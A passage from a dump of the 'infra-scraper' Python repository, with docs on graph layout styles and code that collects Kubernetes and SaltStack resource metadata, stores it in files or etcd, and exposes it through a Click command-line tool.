diagram\" for this kind of drawings follows the use\nof a similar type of diagram by Wattenberg (2002) to visualize the repetition\npatterns in strings, by using arcs to connect pairs of equal substrings.\nHowever, this style of graph drawing is much older than its name, dating back\nto the work of Saaty (1964) and Nicholson (1968), who used arc diagrams to\nstudy crossing numbers of graphs. An older but less frequently used name for\narc diagrams is `linear embeddings`.\n\nHeer, Bostock & Ogievetsky wrote that arc diagrams \"may not convey the overall\nstructure of the graph as effectively as a two-dimensional layout\", but that\ntheir layout makes it easy to display multivariate data associated with the\nvertices of the graph.\n\n\nSample Visualizations\n=====================\n\n.. figure:: ../static/img/arc-diagram.png\n :width: 100%\n :figclass: align-center\n\n Arc diagram of OpenStack project's resources (cca 100 nodes)\n\n\nMore Information\n================\n\n* https://bl.ocks.org/rpgove/53bb49d6ed762139f33bdaea1f3a9e1c\n* https://en.wikipedia.org/wiki/Arc_diagram" }, { "alpha_fraction": 0.7656537890434265, "alphanum_fraction": 0.7670350074768066, "avg_line_length": 35.79661178588867, "blob_id": "3ba516fb54be58687f2699fe6b890d51f1a45607", "content_id": "4c593efaa4c47a5afc48558aebf05c1825fe8de3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2172, "license_type": "permissive", "max_line_length": 106, "num_lines": 59, "path": "/doc/source/text/layout-index.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n=====================\nVisualization Layouts\n=====================\n\n``Graph drawing`` or ``network diagram`` is a pictorial representation of the\nvertices and edges of a graph. This drawing should not be confused with the\ngraph itself, very different layouts can correspond to the same graph. In the\nabstract, all that matters is which pairs of vertices are connected by edges.\nIn the concrete, however, the arrangement of these vertices and edges within a\ndrawing affects its understandability, usability, fabrication cost, and\naesthetics.\n\nThe problem gets worse, if the graph changes over time by adding and deleting\nedges (dynamic graph drawing) and the goal is to preserve the user's mental\nmap.\n\n\nConventions\n===========\n\nGraphs are frequently drawn as ``node-link diagrams`` in which the vertices\nare represented as disks, boxes, or textual labels and the edges are\nrepresented as line segments, polylines, or curves in the Euclidean plane.\n\nNode-link diagrams can be traced back to the 13th century work of Ramon Llull,\nwho drew diagrams of this type for complete graphs in order to analyze all\npairwise combinations among sets of metaphysical concepts.\n\nAlternative conventions to ``node-link diagrams`` include:\n\n\t``Adjacency representations`` such as ``circle packings``, in which vertices\n\tare represented by disjoint regions in the plane and edges are represented by\n\tadjacencies between regions.\n\n\t``Intersection representations`` in which vertices are represented by non-\n\tdisjoint geometric objects and edges are represented by their intersections.\n\n\n\t``Visibility representations`` in which vertices are represented by regions in\n\tthe plane and edges are represented by regions that have an unobstructed line\n\tof sight to each other.\n\n\t``Confluent drawings``, in which edges are represented as smooth curves within mathematical train tracks.\n\n\t``Fabrics``, in which nodes are represented as horizontal lines and edges as vertical lines.\n\n\tVisualizations of the ``adjacency matrix`` of the graph.\n\n\n.. toctree::\n :maxdepth: 2\n\n layout-arc.rst\n layout-bundle.rst\n layout-force.represented\n layout-hive.rst\n layout-matrix.rst\n\n.. layout-treemap.rst\n" }, { "alpha_fraction": 0.5673122406005859, "alphanum_fraction": 0.5729806423187256, "avg_line_length": 28.81690216064453, "blob_id": "ccb4652fc52b72201051f5763a530494c86c4bd3", "content_id": "d82ca0e6905a4f5b2df3bd4691ef051e155b946d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2117, "license_type": "permissive", "max_line_length": 77, "num_lines": 71, "path": "/setup.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\n\nVERSION = '0.4'\n\nwith open('README.rst') as readme:\n LONG_DESCRIPTION = ''.join(readme.readlines())\n\nDESCRIPTION = \"\"\"Infrastrucutre metadata scraper with support for multiple\nresource providers and tools for relational analysis and visualization.\"\"\"\n\nsetup(\n name='infra-scraper',\n version=VERSION,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n author='Aleš Komárek',\n author_email='[email protected]',\n license='Apache License, Version 2.0',\n url='https://github.com/cznewt/infra-scraper/',\n packages=find_packages(),\n install_requires=[\n 'pyyaml',\n 'msgpack-python',\n 'Flask',\n 'Click',\n 'os_client_config',\n 'python-cinderclient',\n 'python-glanceclient',\n 'python-heatclient',\n 'python-keystoneclient',\n 'python-novaclient',\n 'python-neutronclient',\n 'pykube',\n 'boto3',\n 'tosca-parser',\n 'salt-pepper',\n 'python-terraform',\n 'pydot',\n 'graphviz',\n 'juju'\n ],\n extras_require={\n 'tests': [\n 'pytest',\n 'flake8'],\n 'docs': [\n 'sphinx >= 1.4',\n 'sphinx_rtd_theme']\n },\n classifiers=[\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n ],\n entry_points={\n 'console_scripts': [\n 'scraper_web = infra_scraper.cli:runserver',\n 'scraper_status = infra_scraper.cli:status',\n 'scraper_get = infra_scraper.cli:scrape',\n 'scraper_get_forever = infra_scraper.cli:scrape_forever',\n 'scraper_get_all = infra_scraper.cli:scrape_all',\n 'scraper_get_all_forever = infra_scraper.cli:scrape_all_forever',\n ],\n },\n)\n" }, { "alpha_fraction": 0.5571625232696533, "alphanum_fraction": 0.5646522045135498, "avg_line_length": 41.08695602416992, "blob_id": "3b9359bba72dd110366a3846b5143669d5f1aecc", "content_id": "e42b62ed34fc245d0759e3594f8a9bf9101a6e83", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11616, "license_type": "permissive", "max_line_length": 98, "num_lines": 276, "path": "/infra_scraper/input/kubernetes.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport yaml\nimport tempfile\nimport pykube\nfrom requests.exceptions import HTTPError\nfrom infra_scraper.input.base import BaseInput\nfrom infra_scraper.utils import setup_logger\n\nlogger = setup_logger('input.kubernetes')\n\n\nclass KubernetesInput(BaseInput):\n\n def __init__(self, **kwargs):\n self.kind = 'kubernetes'\n self.scope = kwargs.get('scope', 'local')\n super(KubernetesInput, self).__init__(**kwargs)\n config_file, filename = tempfile.mkstemp()\n config_content = {\n 'apiVersion': 'v1',\n 'clusters': [{\n 'cluster': self.config['cluster'],\n 'name': self.name,\n }],\n 'contexts': [{\n 'context': {\n 'cluster': self.name,\n 'user': self.name,\n },\n 'name': self.name,\n }],\n 'current-context': self.name,\n 'kind': 'Config',\n 'preferences': {},\n 'users': [{\n 'name': self.name,\n 'user': self.config['user']\n }]\n }\n os.write(config_file, yaml.safe_dump(config_content).encode())\n os.close(config_file)\n self.config_wrapper = pykube.KubeConfig.from_file(filename)\n os.remove(filename)\n self.api = pykube.HTTPClient(self.config_wrapper)\n\n def scrape_all_resources(self):\n self.scrape_config_maps()\n self.scrape_cron_jobs()\n self.scrape_daemon_sets()\n self.scrape_deployments()\n self.scrape_endpoints()\n self.scrape_events()\n self.scrape_horizontal_pod_autoscalers()\n self.scrape_ingresses()\n self.scrape_jobs()\n if self.scope == 'global':\n self.scrape_namespaces()\n self.scrape_nodes()\n self.scrape_persistent_volumes()\n self.scrape_persistent_volume_claims()\n self.scrape_pods()\n self.scrape_replica_sets()\n self.scrape_replication_controllers()\n self.scrape_roles()\n self.scrape_secrets()\n self.scrape_service_accounts()\n self.scrape_services()\n self.scrape_stateful_sets()\n self.scrape_containers()\n\n def _create_relations(self):\n\n namespace_2_uid = {}\n for resource_id, resource in self.resources.get('k8s_namespace', {}).items():\n resource_mapping = resource['metadata']['metadata']['name']\n namespace_2_uid[resource_mapping] = resource_id\n\n node_2_uid = {}\n for resource_id, resource in self.resources.get('k8s_node', {}).items():\n resource_mapping = resource['metadata']['metadata']['name']\n node_2_uid[resource_mapping] = resource_id\n\n secret_2_uid = {}\n for resource_id, resource in self.resources.get('k8s_secret', {}).items():\n resource_mapping = resource['metadata']['metadata']['name']\n secret_2_uid[resource_mapping] = resource_id\n\n volume_2_uid = {}\n for resource_id, resource in self.resources.get('k8s_persistent_volume', {}).items():\n resource_mapping = resource['metadata']['metadata']['name']\n volume_2_uid[resource_mapping] = resource_id\n\n service_run_2_uid = {}\n service_app_2_uid = {}\n for resource_id, resource in self.resources.get('k8s_service', {}).items():\n if resource['metadata']['spec'].get('selector', {}) is not None:\n if resource['metadata']['spec'].get('selector', {}).get('run', False):\n selector = resource['metadata']['spec']['selector']['run']\n service_run_2_uid[selector] = resource_id\n if resource['metadata']['spec'].get('selector', {}).get('app', False):\n selector = resource['metadata']['spec']['selector']['app']\n service_app_2_uid[selector] = resource_id\n\n # Define relationships between namespace and all namespaced resources.\n for resource_type, resource_dict in self.resources.items():\n for resource_id, resource in resource_dict.items():\n if 'namespace' in resource.get('metadata', {}).get('metadata', {}):\n self._scrape_relation(\n 'in_k8s_namespace',\n resource_id,\n namespace_2_uid[resource['metadata']['metadata']['namespace']])\n\n # Define relationships between service accounts and secrets\n for resource_id, resource in self.resources.get('k8s_service_account', {}).items():\n for secret in resource['metadata']['secrets']:\n self._scrape_relation('use_k8s_secret',\n resource_id,\n secret_2_uid[secret['name']])\n \"\"\"\n for resource_id, resource in self.resources['k8s_persistent_volume'].items():\n self._scrape_relation('k8s_persistent_volume-k8s_persistent_volume_claim',\n resource_id,\n volume_2_uid[resource['spec']['volumeName']])\n \"\"\"\n\n # Define relationships between replica sets and deployments\n for resource_id, resource in self.resources.get('k8s_replica_set', {}).items():\n deployment_id = resource['metadata']['metadata']['ownerReferences'][0]['uid']\n self._scrape_relation(\n 'in_k8s_deployment',\n resource_id,\n deployment_id)\n\n for resource_id, resource in self.resources.get('k8s_pod', {}).items():\n # Define relationships between pods and nodes\n if resource['metadata']['spec']['nodeName'] is not None:\n node = resource['metadata']['spec']['nodeName']\n self._scrape_relation('on_k8s_node',\n resource_id,\n node_2_uid[node])\n\n # Define relationships between pods and replication sets and\n # replication controllers.\n if resource['metadata']['metadata'].get('ownerReferences', False):\n if resource['metadata']['metadata']['ownerReferences'][0]['kind'] == 'ReplicaSet':\n rep_set_id = resource['metadata']['metadata']['ownerReferences'][0]['uid']\n self._scrape_relation(\n 'use_k8s_replication',\n rep_set_id,\n resource_id)\n\n # Define relationships between pods and services.\n if resource['metadata']['metadata']['labels'].get('run', False):\n selector = resource['metadata']['metadata']['labels']['run']\n self._scrape_relation(\n 'in_k8s_pod',\n service_run_2_uid[selector],\n resource_id)\n if resource['metadata']['metadata']['labels'].get('app', False):\n try:\n selector = resource['metadata']['metadata']['labels']['app']\n self._scrape_relation(\n 'in_k8s_pod',\n service_app_2_uid[selector],\n resource_id)\n except Exception:\n pass\n\n def _scrape_k8s_resources(self, response, kind):\n try:\n for item in response:\n resource = item.obj\n self._scrape_resource(resource['metadata']['uid'],\n resource['metadata']['name'],\n kind, None, metadata=resource)\n except HTTPError as exception:\n logger.error(exception)\n\n def scrape_containers(self):\n for resource_id, resource in self.resources['k8s_pod'].items():\n for container in resource['metadata']['spec']['containers']:\n container_id = \"{}-{}\".format(resource_id,\n container['name'])\n self._scrape_resource(container_id,\n container['name'],\n 'k8s_container', None,\n metadata=container)\n self._scrape_relation('in_k8s_pod',\n container_id,\n resource_id)\n\n def scrape_config_maps(self):\n response = pykube.ConfigMap.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_config_map')\n\n def scrape_cron_jobs(self):\n response = pykube.CronJob.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_blow_job')\n\n def scrape_daemon_sets(self):\n response = pykube.DaemonSet.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_daemon_set')\n\n def scrape_deployments(self):\n response = pykube.Deployment.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_deployment')\n\n def scrape_endpoints(self):\n response = pykube.Endpoint.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_endpoint')\n\n def scrape_events(self):\n response = pykube.Event.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_event')\n\n def scrape_horizontal_pod_autoscalers(self):\n response = pykube.HorizontalPodAutoscaler.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_horizontal_pod_autoscaler')\n\n def scrape_ingresses(self):\n response = pykube.Ingress.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_ingress')\n\n def scrape_jobs(self):\n response = pykube.Job.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_job')\n\n def scrape_namespaces(self):\n response = pykube.Namespace.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_namespace')\n\n def scrape_nodes(self):\n response = pykube.Node.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_node')\n\n def scrape_persistent_volumes(self):\n response = pykube.PersistentVolume.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_persistent_volume')\n\n def scrape_persistent_volume_claims(self):\n response = pykube.PersistentVolumeClaim.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_persistent_volume_claim')\n\n def scrape_pods(self):\n response = pykube.Pod.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_pod')\n\n def scrape_replica_sets(self):\n response = pykube.ReplicaSet.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_replica_set')\n\n def scrape_replication_controllers(self):\n response = pykube.ReplicationController.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_replication_controller')\n\n def scrape_roles(self):\n response = pykube.Role.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_role')\n\n def scrape_secrets(self):\n response = pykube.Secret.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_secret')\n\n def scrape_service_accounts(self):\n response = pykube.ServiceAccount.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_service_account')\n\n def scrape_services(self):\n response = pykube.Service.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_service')\n\n def scrape_stateful_sets(self):\n response = pykube.StatefulSet.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_stateful_set')\n" }, { "alpha_fraction": 0.43393394351005554, "alphanum_fraction": 0.43588587641716003, "avg_line_length": 41.15189743041992, "blob_id": "a7cbbc662f4f53e5c0107a6ac9d6eaa0a2e44a0a", "content_id": "83a97919eb3fb3d7fd023b028f2288f502756d53", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6660, "license_type": "permissive", "max_line_length": 87, "num_lines": 158, "path": "/infra_scraper/input/saltstack.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom pepper.libpepper import Pepper\nfrom infra_scraper.input.base import BaseInput\nfrom infra_scraper.utils import setup_logger\n\nlogger = setup_logger('input.salt')\n\n\nclass SaltStackInput(BaseInput):\n\n def __init__(self, **kwargs):\n self.kind = 'salt'\n super(SaltStackInput, self).__init__(**kwargs)\n self.api = Pepper(self.config['auth_url'])\n self.api.login(self.config['username'],\n self.config['password'],\n 'pam')\n\n def scrape_all_resources(self):\n self.scrape_jobs()\n self.scrape_minions()\n self.scrape_services()\n self.scrape_high_states()\n # self.scrape_low_states()\n\n def _create_relations(self):\n \"\"\"\n for resource_id, resource in self.resources['salt_low_state'].items():\n # Define relationships between low states and nodes.\n self._scrape_relation(\n 'salt_minion-salt_low_state',\n resource['metadata']['minion'],\n resource_id)\n split_service = resource['metadata']['__sls__'].split('.')\n self._scrape_relation(\n 'salt_service-salt_low_state',\n '{}|{}.{}'.format(resource['metadata']['minion'],\n split_service[0], split_service[1]),\n resource_id)\n \"\"\"\n for resource_id, resource in self.resources.get('salt_high_state', {}).items():\n # Define relationships between high states and nodes.\n self._scrape_relation(\n 'on_salt_minion',\n resource_id,\n resource['metadata']['minion'])\n split_service = resource['metadata']['__sls__'].split('.')\n self._scrape_relation(\n 'contains_salt_high_state',\n '{}|{}.{}'.format(resource['metadata']['minion'],\n split_service[0], split_service[1]),\n resource_id)\n\n for resource_id, resource in self.resources.get('salt_service', {}).items():\n self._scrape_relation(\n 'on_salt_minion',\n resource_id,\n resource['metadata']['host'])\n\n for resource_id, resource in self.resources.get('salt_job', {}).items():\n self._scrape_relation(\n 'by_salt_user',\n resource_id,\n resource['metadata']['User'])\n for minion_id, result in resource['metadata'].get('Result', {}).items():\n self._scrape_relation(\n 'on_salt_minion',\n resource_id,\n minion_id)\n if type(result) is list:\n logger.error(result[0])\n else:\n for state_id, state in result.items():\n if '__id__' in state:\n result_id = '{}|{}'.format(minion_id, state['__id__'])\n self._scrape_relation(\n 'contains_salt_high_state',\n resource_id,\n result_id)\n\n def scrape_jobs(self):\n response = self.api.low([{\n 'client': 'runner',\n 'fun': 'jobs.list_jobs',\n 'arg': \"search_function='[\\\"state.apply\\\", \\\"state.sls\\\"]'\"\n }]).get('return')[0]\n for job_id, job in response.items():\n if job['Function'] in ['state.apply', 'state.sls']:\n result = self.api.lookup_jid(job_id).get('return')[0]\n job['Result'] = result\n self._scrape_resource(job_id,\n job['Function'],\n 'salt_job', None, metadata=job)\n self._scrape_resource(job['User'],\n job['User'],\n 'salt_user', None, metadata={})\n\n def scrape_minions(self):\n response = self.api.low([{\n 'client': 'local',\n 'tgt': '*',\n 'fun': 'grains.items'\n }]).get('return')[0]\n for minion_id, minion in response.items():\n self._scrape_resource(minion_id,\n minion_id,\n 'salt_minion', None, metadata=minion)\n\n def scrape_services(self):\n response = self.api.low([{\n 'client': 'local',\n 'expr_form': 'compound',\n 'tgt': 'I@salt:master',\n 'fun': 'saltresource.graph_data'\n }]).get('return')[0]\n for minion_id, minion in response.items():\n for service in minion['graph']:\n self._scrape_resource('{}|{}'.format(minion_id,\n service['service']),\n service['service'],\n 'salt_service', None,\n metadata=service)\n\n def scrape_low_states(self):\n response = self.api.low([{\n 'client': 'local',\n 'tgt': '*',\n 'fun': 'state.show_lowstate'\n }]).get('return')[0]\n for minion_id, low_states in response.items():\n for low_state in low_states:\n low_state['minion'] = minion_id\n self._scrape_resource('{}|{}|{}'.format(minion_id,\n low_state['state'],\n low_state['__id__']),\n '{} {}'.format(low_state['state'],\n low_state['__id__']),\n 'salt_low_state', None,\n metadata=low_state)\n\n def scrape_high_states(self):\n response = self.api.low([{\n 'client': 'local',\n 'tgt': '*',\n 'fun': 'state.show_highstate'\n }]).get('return')[0]\n for minion_id, high_states in response.items():\n if type(high_states) is list:\n logger.error(high_states[0])\n else:\n for high_state_id, high_state in high_states.items():\n high_state['minion'] = minion_id\n self._scrape_resource('{}|{}'.format(minion_id,\n high_state_id),\n high_state_id,\n 'salt_high_state', None,\n metadata=high_state)\n" }, { "alpha_fraction": 0.5402425527572632, "alphanum_fraction": 0.5406100749969482, "avg_line_length": 33.871795654296875, "blob_id": "eb9dec917c8538ccc0b7b2b70b034bd86b1ddc4c", "content_id": "619dc3e16594cd458d85f4cde8a0d33d6e1a87c1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2721, "license_type": "permissive", "max_line_length": 74, "num_lines": 78, "path": "/infra_scraper/storage/file.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nfrom .base import BaseStorage\nimport os\nimport glob\nimport yaml\nimport msgpack\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass FileStorage(BaseStorage):\n\n def __init__(self, **kwargs):\n super(FileStorage, self).__init__(**kwargs)\n self.storage_dir = kwargs.get('storage_dir', '/tmp/scraper')\n try:\n os.stat(self.storage_dir)\n except Exception:\n os.mkdir(self.storage_dir)\n\n def _storage_dir_exist(self, name):\n try:\n os.stat(self._get_storage_dir(name))\n except Exception:\n os.mkdir(self._get_storage_dir(name))\n\n def _get_storage_dir(self, name):\n return os.path.join(self.storage_dir, name)\n\n def _get_last_timestamp(self, name):\n sinks = glob.glob('{}/*.yaml'.format(self._get_storage_dir(name)))\n last_sink = max(sinks, key=os.path.getctime)\n return last_sink.split('/')[-1].replace('.yaml', '')\n\n def save_data(self, name, data):\n self._storage_dir_exist(name)\n filename = '{}/{}.yaml'.format(self._get_storage_dir(name),\n data['timestamp'])\n with open(filename, 'w') as outfile:\n yaml.safe_dump(data, outfile, default_flow_style=False)\n outfile.close()\n self.last_timestamp = data['timestamp']\n\n def load_data(self, name):\n data = None\n self.last_timestamp = self._get_last_timestamp(name)\n filename = '{}/{}.yaml'.format(self._get_storage_dir(name),\n self.last_timestamp)\n with open(filename, 'r') as stream:\n try:\n data = yaml.load(stream)\n except yaml.YAMLError as exception:\n logger.error(exception)\n stream.close()\n return data\n\n def save_output_data(self, name, kind, data):\n self._storage_dir_exist(name)\n filename = '{}/{}-{}.yml'.format(self._get_storage_dir(name),\n data['timestamp'],\n kind)\n with open(filename, 'w') as outfile:\n yaml.safe_dump(data, outfile, default_flow_style=False)\n outfile.close()\n\n def load_output_data(self, name, kind):\n last_timestamp = self._get_last_timestamp(name)\n data = None\n filename = '{}/{}-{}.yml'.format(self._get_storage_dir(name),\n last_timestamp, kind)\n with open(filename, 'r') as stream:\n try:\n data = yaml.load(stream.read())\n except Exception as exception:\n logger.error(exception)\n data = None\n stream.close()\n return data\n" }, { "alpha_fraction": 0.545976996421814, "alphanum_fraction": 0.5541871786117554, "avg_line_length": 31.026315689086914, "blob_id": "eb9507cdc9246d1e9c1cfc076c034535f91230b6", "content_id": "befbadbb391d08b7b30a2bfb1d72f5fce8c4005d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1218, "license_type": "permissive", "max_line_length": 68, "num_lines": 38, "path": "/infra_scraper/storage/etcd.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nfrom .base import BaseStorage\nimport os\nimport etcd\nimport yaml\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass EtcdStorage(BaseStorage):\n\n def __init__(self, **kwargs):\n super(EtcdStorage, self).__init__(**kwargs)\n self.client = etcd.Client(\n host='127.0.0.1', port=4003)\n self.storage_path = '/scrape'\n\n def _get_storage_path(self, name):\n return os.path.join(self.storage_path, self.name)\n\n def save_data(self, name, data):\n filename = os.path.join(self._get_storage_path(),\n data['timestamp'])\n with open(filename, 'w') as outfile:\n yaml.safe_dump(data, outfile, default_flow_style=False)\n self.last_timestamp = data['timestamp']\n\n def load_data(self, name):\n data = None\n if self.last_timestamp is not None:\n filename = '{}/{}.yaml'.format(self._get_storage_path(),\n self.last_timestamp)\n with open(filename, 'r') as stream:\n try:\n data = yaml.load(stream)\n except yaml.YAMLError as exception:\n logger.error(exception)\n return data\n" }, { "alpha_fraction": 0.6240000128746033, "alphanum_fraction": 0.6377142667770386, "avg_line_length": 19.34883689880371, "blob_id": "6ea5c19749df07dbc086aa00bcf56ab0cb5490b2", "content_id": "1fabf3e0aad700bff76798ace23bb88f69712c79", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 875, "license_type": "permissive", "max_line_length": 65, "num_lines": 43, "path": "/doc/source/conf.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport sys\nimport os\n\nsys.path.insert(0, os.path.abspath('..'))\n\nextensions = [\n 'sphinx.ext.autodoc',\n 'sphinx.ext.doctest',\n 'sphinx.ext.intersphinx',\n 'sphinx.ext.todo',\n 'sphinx.ext.coverage',\n 'sphinx.ext.imgmath',\n 'sphinx.ext.viewcode',\n]\n\ntemplates_path = ['_templates']\nsource_suffix = '.rst'\nmaster_doc = 'index'\nproject = u'InfraScraper'\ncopyright = u'2017, Aleš Komárek'\nversion = '0.2'\nrelease = '0.2.0'\nexclude_patterns = []\npygments_style = 'sphinx'\n\nhtml_theme = \"sphinx_rtd_theme\"\nhtml_theme_options = {\n 'collapse_navigation': False,\n 'display_version': False,\n}\n\nlatex_elements = {}\nlatex_documents = [\n ('index', 'infra_scraper.tex', u'InfraScraper Documentation',\n u'InfraScraper Team', 'manual'),\n]\n\nman_pages = [\n ('index', 'infra_scraper', u'InfraScraper Documentation',\n [u'Komarek'], 1)\n]\n" }, { "alpha_fraction": 0.6901960968971252, "alphanum_fraction": 0.6996078491210938, "avg_line_length": 18.90625, "blob_id": "3ad9e55b87584632af67355cfa2f350a949d7ed3", "content_id": "41e24ce630e854b04c527c6a775842f2ca7a0c0c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1275, "license_type": "permissive", "max_line_length": 52, "num_lines": 64, "path": "/infra_scraper/cli.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport click\nimport yaml\nimport logging\nfrom infra_scraper.main import InfraScraper\nfrom infra_scraper.server import run\n\nlogger = logging.getLogger(__name__)\n\n\[email protected]()\ndef cli():\n pass\n\n\[email protected]()\[email protected]('name')\ndef scrape(name):\n scraper = InfraScraper()\n scraper.scrape_data(name)\n\n\[email protected]()\[email protected]('name')\[email protected]('interval', default=10)\ndef scrape_forever(name, interval):\n scraper = InfraScraper()\n scraper.scrape_data_forever(name, int(interval))\n\n\[email protected]()\ndef scrape_all():\n scraper = InfraScraper()\n scraper.scrape_all_data()\n\n\[email protected]()\[email protected]('--interval', default=10)\ndef scrape_all_forever(interval):\n scraper = InfraScraper()\n scraper.scrape_all_data_forever(int(interval))\n\n\[email protected]()\ndef status():\n scraper = InfraScraper()\n print(yaml.safe_dump(scraper.status()))\n\n\[email protected]()\[email protected]('--host', default=\"0.0.0.0\")\[email protected]('--port', default=8076)\ndef runserver(__host, __port):\n run(host=__host, port=__port)\n\n\ncli.add_command(status)\ncli.add_command(scrape)\ncli.add_command(runserver)\ncli.add_command(scrape_all)\ncli.add_command(scrape_forever)\ncli.add_command(scrape_all_forever)\n\nif __name__ == '__main__':\n cli()\n" }, { "alpha_fraction": 0.5663265585899353, "alphanum_fraction": 0.5663265585899353, "avg_line_length": 23.375, "blob_id": "04954380a909c49404a24e5e1b5acb649fc29b54", "content_id": "16b0950364b15a5f36aed39f330a5890073832f3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 196, "license_type": "permissive", "max_line_length": 53, "num_lines": 8, "path": "/doc/source/text/input-saltstack.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n=========================\nSaltStack Infrastructures\n=========================\n\nConfiguration for connecting to Salt API.\n\n.. literalinclude:: ../static/config/config-salt.yaml\n :language: yaml\n" }, { "alpha_fraction": 0.6607543230056763, "alphanum_fraction": 0.6788648366928101, "avg_line_length": 24.78972625732422, "blob_id": "6f380d2bb8494ff8bcb9342d2dca306a8dda9ee4", "content_id": "8551b08407528c3dd102f16537e261a55e7ca5f9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 16070, "license_type": "permissive", "max_line_length": 78, "num_lines": 623, "path": "/README.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n==============================\nInfrastucture Metadata Scraper\n==============================\n\nThe aim of this project is to acquire live infrastructure topology data from\nany resource provider for further relational analysis and visualisations.\n\n\nMetadata Collection\n===================\n\nThe pull approach for scraping endpoint APIs is supported for the moment, but\nthe processing push from target services will be supported.\n\nCurrently supported resource metadata providers are:\n\n* Kubernetes clusters\n* OpenStack clouds\n* Amazon web services\n* SaltStack infrastructures\n* Terraform templates\n* Jenkins pipelines\n\nThe following resource providers are to be intergrated in near future.\n\n* GCE and Azure clouds\n* Cloudify TOSCA blueprints\n* MAAS servers\n* JUJU templates\n\nFrom these resource providers we are able to capture all available resources\nfor given\n\nRelational Analysis\n===================\n\nThe output of scraping is directed graph that can be subject for further\nanalysis. We can perform several transformation functions on the graphs.\n\n\nGraph Analysis\n--------------\n\nYou can alter the scraped strusctured in several ways. Either you want to get\nthe subset of the resources (vertices and edges) or you want to combine\nmultiple graphs and link the same nodes in each.\n\n\nSubgraphs - Slicing and Dicing\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nTo slice and dice is to break a body of information down into smaller parts or\nto examine it from different viewpoints that we can understand it better.\n\nIn cooking, you can slice a vegetable or other food or you can dice it (which\nmeans to break it down into small cubes). One approach to dicing is to first\nslice and then cut the slices up into dices.\n\nIn data analysis, the term generally implies a systematic reduction of a body\nof data into smaller parts or views that will yield more information. The term\nis also used to mean the presentation of information in a variety of different\nand useful ways. In our case we find useful subgraphs of the infrastructures.\n\nFor example in OpenStack infrastructure we can show the ``aggregate zone`` -\n``hypervisor`` - ``instance`` relations and show the quantitative properties\nof hypervisors and instances. The properties can be used RAM or CPU, runtime -\nthe age of resources or any other property of value.\n\nAnother example would be filtering of resources by tenant or stack\nattributions. This reduces the number of nodes to the reasonable amount.\n\n\nInter-graphs\n~~~~~~~~~~~~\n\nOn other hand you want to combine several graphs to create one overlaying\ngraph. This is very useful to combine in other ways undelated resources. For\nexample we can say that ``OpenStack Server`` or ``AWS Instance`` and ``Salt\nMinion`` are really the same resources.\n\n\nData Corellations\n-----------------\n\nWith the relational information we are now able to corellate resources and\njoined topologies from varius information sources. This gives you the real\npower, while having the underlying relational structure, you can gather\nunstructured metrics, events, alarms and put them into proper context in you\nmanaged resources.\n\n\nMetrics Corellations\n~~~~~~~~~~~~~~~~~~~~\n\nThe metrics collected from you infrastrucute can be assigned to various\nvertices and edges in your network. This can give you more insight to the\nutilisation of depicted infrastructures.\n\nYou can have the following query to the prometheus server that gives you the\nrate of error response codes goint through a HAproxy for 